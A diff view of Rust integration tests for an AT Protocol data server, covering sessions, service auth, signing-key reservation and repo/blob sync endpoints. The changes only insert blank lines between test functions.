preserved or encoded"); 285 322 } 323 + 286 324 #[test] 287 325 fn test_null_byte_in_input() { 288 326 let with_null = "client\0id"; 289 327 let sanitized = sanitize_header_value(with_null); 290 328 assert!(sanitized.contains("client"), "Content before null should be preserved"); 291 329 } 330 + 292 331 #[test] 293 332 fn test_very_long_input_handling() { 294 333 let long_input = "x".repeat(10000);
+17
tests/server.rs
··· 4 4 use helpers::verify_new_account; 5 5 use reqwest::StatusCode; 6 6 use serde_json::{Value, json}; 7 + 7 8 #[tokio::test] 8 9 async fn test_health() { 9 10 let client = client(); ··· 15 16 assert_eq!(res.status(), StatusCode::OK); 16 17 assert_eq!(res.text().await.unwrap(), "OK"); 17 18 } 19 + 18 20 #[tokio::test] 19 21 async fn test_describe_server() { 20 22 let client = client(); ··· 30 32 let body: Value = res.json().await.expect("Response was not valid JSON"); 31 33 assert!(body.get("availableUserDomains").is_some()); 32 34 } 35 + 33 36 #[tokio::test] 34 37 async fn test_create_session() { 35 38 let client = client(); ··· 69 72 let body: Value = res.json().await.expect("Response was not valid JSON"); 70 73 assert!(body.get("accessJwt").is_some()); 71 74 } 75 + 72 76 #[tokio::test] 73 77 async fn test_create_session_missing_identifier() { 74 78 let client = client(); ··· 90 94 res.status() 91 95 ); 92 96 } 97 + 93 98 #[tokio::test] 94 99 async fn test_create_account_invalid_handle() { 95 100 let client = client(); ··· 113 118 "Expected 400 for invalid handle chars" 114 119 ); 115 120 } 121 + 116 122 #[tokio::test] 117 123 async fn test_get_session() { 118 124 let client = client(); ··· 127 133 .expect("Failed to send request"); 128 134 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 129 135 } 136 + 130 137 #[tokio::test] 131 138 async fn test_refresh_session() { 132 139 let client = client(); ··· 188 195 assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt); 189 196 assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt); 190 197 } 198 + 191 199 #[tokio::test] 192 200 async fn test_delete_session() { 193 201 let client = client(); ··· 202 210 .expect("Failed to send request"); 203 211 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 204 212 } 213 + 205 214 #[tokio::test] 206 215 async fn test_get_service_auth_success() { 207 216 let client = client(); ··· 230 239 assert_eq!(claims["sub"], did); 231 240 assert_eq!(claims["aud"], "did:web:example.com"); 232 241 } 242 + 233 243 #[tokio::test] 234 244 async fn test_get_service_auth_with_lxm() { 235 245 let client = client(); ··· 255 265 assert_eq!(claims["iss"], did); 256 266 assert_eq!(claims["lxm"], "com.atproto.repo.getRecord"); 257 267 } 268 + 258 269 #[tokio::test] 259 270 async fn test_get_service_auth_no_auth() { 260 271 let client = client(); ··· 272 283 let body: Value = res.json().await.expect("Response was not valid JSON"); 273 284 assert_eq!(body["error"], "AuthenticationRequired"); 274 285 } 286 + 275 287 #[tokio::test] 276 288 async fn test_get_service_auth_missing_aud() { 277 289 let client = client(); ··· 287 299 .expect("Failed to send request"); 288 300 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 289 301 } 302 + 290 303 #[tokio::test] 291 304 async fn test_check_account_status_success() { 292 305 let client = client(); ··· 308 321 assert!(body["repoRev"].is_string()); 309 322 assert!(body["indexedRecords"].is_number()); 310 323 } 324 + 311 325 #[tokio::test] 312 326 async fn test_check_account_status_no_auth() { 313 327 let client = client(); ··· 323 337 let body: Value = res.json().await.expect("Response was not valid JSON"); 324 338 assert_eq!(body["error"], "AuthenticationRequired"); 325 339 } 340 + 326 341 #[tokio::test] 327 342 async fn test_activate_account_success() { 328 343 let client = client(); ··· 338 353 .expect("Failed to send request"); 339 354 assert_eq!(res.status(), StatusCode::OK); 340 355 } 356 + 341 357 #[tokio::test] 342 358 async fn test_activate_account_no_auth() { 343 359 let client = client(); ··· 351 367 .expect("Failed to send request"); 352 368 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 353 369 } 370 + 354 371 #[tokio::test] 355 372 async fn test_deactivate_account_success() { 356 373 let client = client();
+10
tests/signing_key.rs
··· 4 4 use serde_json::{json, Value}; 5 5 use sqlx::PgPool; 6 6 use helpers::verify_new_account; 7 + 7 8 async fn get_pool() -> PgPool { 8 9 let conn_str = common::get_db_connection_string().await; 9 10 sqlx::postgres::PgPoolOptions::new() ··· 12 13 .await 13 14 .expect("Failed to connect to test database") 14 15 } 16 + 15 17 #[tokio::test] 16 18 async fn test_reserve_signing_key_without_did() { 17 19 let client = common::client(); ··· 34 36 "Signing key should be in did:key format with multibase prefix" 35 37 ); 36 38 } 39 + 37 40 #[tokio::test] 38 41 async fn test_reserve_signing_key_with_did() { 39 42 let client = common::client(); ··· 63 66 assert_eq!(row.did.as_deref(), Some(target_did)); 64 67 assert_eq!(row.public_key_did_key, signing_key); 65 68 } 69 + 66 70 #[tokio::test] 67 71 async fn test_reserve_signing_key_stores_private_key() { 68 72 let client = common::client(); ··· 91 95 assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet"); 92 96 assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future"); 93 97 } 98 + 94 99 #[tokio::test] 95 100 async fn test_reserve_signing_key_unique_keys() { 96 101 let client = common::client(); ··· 121 126 let key2 = body2["signingKey"].as_str().unwrap(); 122 127 assert_ne!(key1, key2, "Each call should generate a unique signing key"); 123 128 } 129 + 124 130 #[tokio::test] 125 131 async fn test_reserve_signing_key_is_public() { 126 132 let client = common::client(); ··· 140 146 "reserveSigningKey should work without authentication" 141 147 ); 142 148 } 149 + 143 150 #[tokio::test] 144 151 async fn test_create_account_with_reserved_signing_key() { 145 152 let client = common::client(); ··· 190 197 "Reserved key should be marked as used" 191 198 ); 192 199 } 200 + 193 201 #[tokio::test] 194 202 async fn test_create_account_with_invalid_signing_key() { 195 203 let client = common::client(); ··· 213 221 let body: Value = res.json().await.unwrap(); 214 222 assert_eq!(body["error"], "InvalidSigningKey"); 215 223 } 224 + 216 225 #[tokio::test] 217 226 async fn test_create_account_cannot_reuse_signing_key() { 218 227 let client = common::client(); ··· 268 277 .unwrap() 269 278 .contains("already used")); 270 279 } 280 + 271 281 #[tokio::test] 272 282 async fn test_reserved_key_tokens_work() { 273 283 let client = common::client();
+4
tests/sync_blob.rs
··· 3 3 use reqwest::StatusCode; 4 4 use reqwest::header; 5 5 use serde_json::Value; 6 + 6 7 #[tokio::test] 7 8 async fn test_list_blobs_success() { 8 9 let client = client(); ··· 35 36 let cids = body["cids"].as_array().unwrap(); 36 37 assert!(!cids.is_empty()); 37 38 } 39 + 38 40 #[tokio::test] 39 41 async fn test_list_blobs_not_found() { 40 42 let client = client(); ··· 52 54 let body: Value = res.json().await.expect("Response was not valid JSON"); 53 55 assert_eq!(body["error"], "RepoNotFound"); 54 56 } 57 + 55 58 #[tokio::test] 56 59 async fn test_get_blob_success() { 57 60 let client = client(); ··· 91 94 let body = res.text().await.expect("Failed to get body"); 92 95 assert_eq!(body, blob_content); 93 96 } 97 + 94 98 #[tokio::test] 95 99 async fn test_get_blob_not_found() { 96 100 let client = client();
+14
tests/sync_deprecated.rs
··· 4 4 use helpers::*; 5 5 use reqwest::StatusCode; 6 6 use serde_json::Value; 7 + 7 8 #[tokio::test] 8 9 async fn test_get_head_success() { 9 10 let client = client(); ··· 23 24 let root = body["root"].as_str().unwrap(); 24 25 assert!(root.starts_with("bafy"), "Root CID should be a CID"); 25 26 } 27 + 26 28 #[tokio::test] 27 29 async fn test_get_head_not_found() { 28 30 let client = client(); ··· 40 42 assert_eq!(body["error"], "HeadNotFound"); 41 43 assert!(body["message"].as_str().unwrap().contains("Could not find root")); 42 44 } 45 + 43 46 #[tokio::test] 44 47 async fn test_get_head_missing_param() { 45 48 let client = client(); ··· 53 56 .expect("Failed to send request"); 54 57 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 55 58 } 59 + 56 60 #[tokio::test] 57 61 async fn test_get_head_empty_did() { 58 62 let client = client(); ··· 69 73 let body: Value = res.json().await.expect("Response was not valid JSON"); 70 74 assert_eq!(body["error"], "InvalidRequest"); 71 75 } 76 + 72 77 #[tokio::test] 73 78 async fn test_get_head_whitespace_did() { 74 79 let client = client(); ··· 83 88 .expect("Failed to send request"); 84 89 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 85 90 } 91 + 86 92 #[tokio::test] 87 93 async fn test_get_head_changes_after_record_create() { 88 94 let client = client(); ··· 112 118 let head2 = body2["root"].as_str().unwrap().to_string(); 113 119 assert_ne!(head1, head2, "Head CID should change after record creation"); 114 120 } 121 + 115 122 #[tokio::test] 116 123 async fn test_get_checkout_success() { 117 124 let client = client(); ··· 137 144 assert!(!body.is_empty(), "CAR file should not be empty"); 138 145 assert!(body.len() > 50, "CAR file should contain actual data"); 139 146 } 147 + 140 148 #[tokio::test] 141 149 async fn test_get_checkout_not_found() { 142 150 let client = client(); ··· 153 161 let body: Value = res.json().await.expect("Response was not valid JSON"); 154 162 assert_eq!(body["error"], "RepoNotFound"); 155 163 } 164 + 156 165 #[tokio::test] 157 166 async fn test_get_checkout_missing_param() { 158 167 let client = client(); ··· 166 175 .expect("Failed to send request"); 167 176 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 168 177 } 178 + 169 179 #[tokio::test] 170 180 async fn test_get_checkout_empty_did() { 171 181 let client = client(); ··· 180 190 .expect("Failed to send request"); 181 191 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 182 192 } 193 + 183 194 #[tokio::test] 184 195 async fn test_get_checkout_empty_repo() { 185 196 let client = client(); ··· 197 208 let body = res.bytes().await.expect("Failed to get body"); 198 209 assert!(!body.is_empty(), "Even empty repo should return CAR header"); 199 210 } 211 + 200 212 #[tokio::test] 201 213 async fn test_get_checkout_includes_multiple_records() { 202 214 let client = client(); ··· 218 230 let body = res.bytes().await.expect("Failed to get body"); 219 231 assert!(body.len() > 500, "CAR file with 5 records should be larger"); 220 232 } 233 + 221 234 #[tokio::test] 222 235 async fn test_get_head_matches_latest_commit() { 223 236 let client = client(); ··· 246 259 let latest_cid = latest_body["cid"].as_str().unwrap(); 247 260 assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid"); 248 261 } 262 + 249 263 #[tokio::test] 250 264 async fn test_get_checkout_car_header_valid() { 251 265 let client = client();
+18
tests/sync_repo.rs
··· 5 5 use reqwest::StatusCode; 6 6 use reqwest::header; 7 7 use serde_json::{Value, json}; 8 + 8 9 #[tokio::test] 9 10 async fn test_get_latest_commit_success() { 10 11 let client = client(); ··· 24 25 assert!(body["cid"].is_string()); 25 26 assert!(body["rev"].is_string()); 26 27 } 28 + 27 29 #[tokio::test] 28 30 async fn test_get_latest_commit_not_found() { 29 31 let client = client(); ··· 41 43 let body: Value = res.json().await.expect("Response was not valid JSON"); 42 44 assert_eq!(body["error"], "RepoNotFound"); 43 45 } 46 + 44 47 #[tokio::test] 45 48 async fn test_get_latest_commit_missing_param() { 46 49 let client = client(); ··· 54 57 .expect("Failed to send request"); 55 58 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 56 59 } 60 + 57 61 #[tokio::test] 58 62 async fn test_list_repos() { 59 63 let client = client(); ··· 76 80 assert!(repo["head"].is_string()); 77 81 assert!(repo["active"].is_boolean()); 78 82 } 83 + 79 84 #[tokio::test] 80 85 async fn test_list_repos_with_limit() { 81 86 let client = client(); ··· 97 102 let repos = body["repos"].as_array().unwrap(); 98 103 assert!(repos.len() <= 2); 99 104 } 105 + 100 106 #[tokio::test] 101 107 async fn test_list_repos_pagination() { 102 108 let client = client(); ··· 135 141 assert_ne!(repos[0]["did"], repos2[0]["did"]); 136 142 } 137 143 } 144 + 138 145 #[tokio::test] 139 146 async fn test_get_repo_status_success() { 140 147 let client = client(); ··· 155 162 assert_eq!(body["active"], true); 156 163 assert!(body["rev"].is_string()); 157 164 } 165 + 158 166 #[tokio::test] 159 167 async fn test_get_repo_status_not_found() { 160 168 let client = client(); ··· 172 180 let body: Value = res.json().await.expect("Response was not valid JSON"); 173 181 assert_eq!(body["error"], "RepoNotFound"); 174 182 } 183 + 175 184 #[tokio::test] 176 185 async fn test_notify_of_update() { 177 186 let client = client(); ··· 187 196 .expect("Failed to send request"); 188 197 assert_eq!(res.status(), StatusCode::OK); 189 198 } 199 + 190 200 #[tokio::test] 191 201 async fn test_request_crawl() { 192 202 let client = client(); ··· 202 212 .expect("Failed to send request"); 203 213 assert_eq!(res.status(), StatusCode::OK); 204 214 } 215 + 205 216 #[tokio::test] 206 217 async fn test_get_repo_success() { 207 218 let client = client(); ··· 245 256 let body = res.bytes().await.expect("Failed to get body"); 246 257 assert!(!body.is_empty()); 247 258 } 259 + 248 260 #[tokio::test] 249 261 async fn test_get_repo_not_found() { 250 262 let client = client(); ··· 262 274 let body: Value = res.json().await.expect("Response was not valid JSON"); 263 275 assert_eq!(body["error"], "RepoNotFound"); 264 276 } 277 + 265 278 #[tokio::test] 266 279 async fn test_get_record_sync_success() { 267 280 let client = client(); ··· 312 325 let body = res.bytes().await.expect("Failed to get body"); 313 326 assert!(!body.is_empty()); 314 327 } 328 + 315 329 #[tokio::test] 316 330 async fn test_get_record_sync_not_found() { 317 331 let client = client(); ··· 334 348 let body: Value = res.json().await.expect("Response was not valid JSON"); 335 349 assert_eq!(body["error"], "RecordNotFound"); 336 350 } 351 + 337 352 #[tokio::test] 338 353 async fn test_get_blocks_success() { 339 354 let client = client(); ··· 369 384 Some("application/vnd.ipld.car") 370 385 ); 371 386 } 387 + 372 388 #[tokio::test] 373 389 async fn test_get_blocks_not_found() { 374 390 let client = client(); ··· 383 399 .expect("Failed to send request"); 384 400 assert_eq!(res.status(), StatusCode::NOT_FOUND); 385 401 } 402 + 386 403 #[tokio::test] 387 404 async fn test_sync_record_lifecycle() { 388 405 let client = client(); ··· 491 508 "Second post should still be accessible" 492 509 ); 493 510 } 511 + 494 512 #[tokio::test] 495 513 async fn test_sync_repo_export_lifecycle() { 496 514 let client = client();
+3
tests/verify_live_commit.rs
··· 3 3 use std::collections::HashMap; 4 4 use std::str::FromStr; 5 5 mod common; 6 + 6 7 #[tokio::test] 7 8 async fn test_verify_live_commit() { 8 9 let client = reqwest::Client::new(); ··· 51 52 } 52 53 } 53 54 } 55 + 54 56 fn commit_unsigned_bytes(commit: &jacquard_repo::commit::Commit<'_>) -> Vec<u8> { 55 57 #[derive(serde::Serialize)] 56 58 struct UnsignedCommit<'a> { ··· 72 74 }; 73 75 serde_ipld_dagcbor::to_vec(&unsigned).unwrap() 74 76 } 77 + 75 78 fn parse_car(cursor: &mut std::io::Cursor<&[u8]>) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> { 76 79 use std::io::Read; 77 80 fn read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> {